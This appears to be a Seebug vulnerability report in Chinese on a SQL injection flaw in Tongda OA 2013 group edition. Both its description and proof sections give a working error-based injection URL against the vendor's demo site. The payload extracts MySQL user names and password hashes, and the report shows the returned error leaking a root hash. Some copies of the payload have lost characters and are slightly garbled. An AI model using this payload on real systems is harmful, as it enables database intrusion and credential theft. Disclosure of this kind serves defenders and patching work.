通达oa2013集团版注入

2015-04-09T00:00:00
ID SSV:96105
Type seebug
Reporter Root
Modified 2015-04-09T00:00:00

Description

简要描述:

通达

详细说明:

官网demo登录: http://www.day900.com/ cw 登陆有点鸡肋 注入点+payload: http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#)&YEAR=2015 返回: 请联系管理员 错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key' SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='Y' AND DEPT_ID IN (1) and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015' 文件:/general/budget/budget_process/budget_year_depts.php

漏洞证明:

注入点+payload: http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#)&YEAR=2015 返回: 请联系管理员 错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key' SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='Y' AND DEPT_ID IN (1) and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015' 文件:/general/budget/budget_process/budget_year_depts.php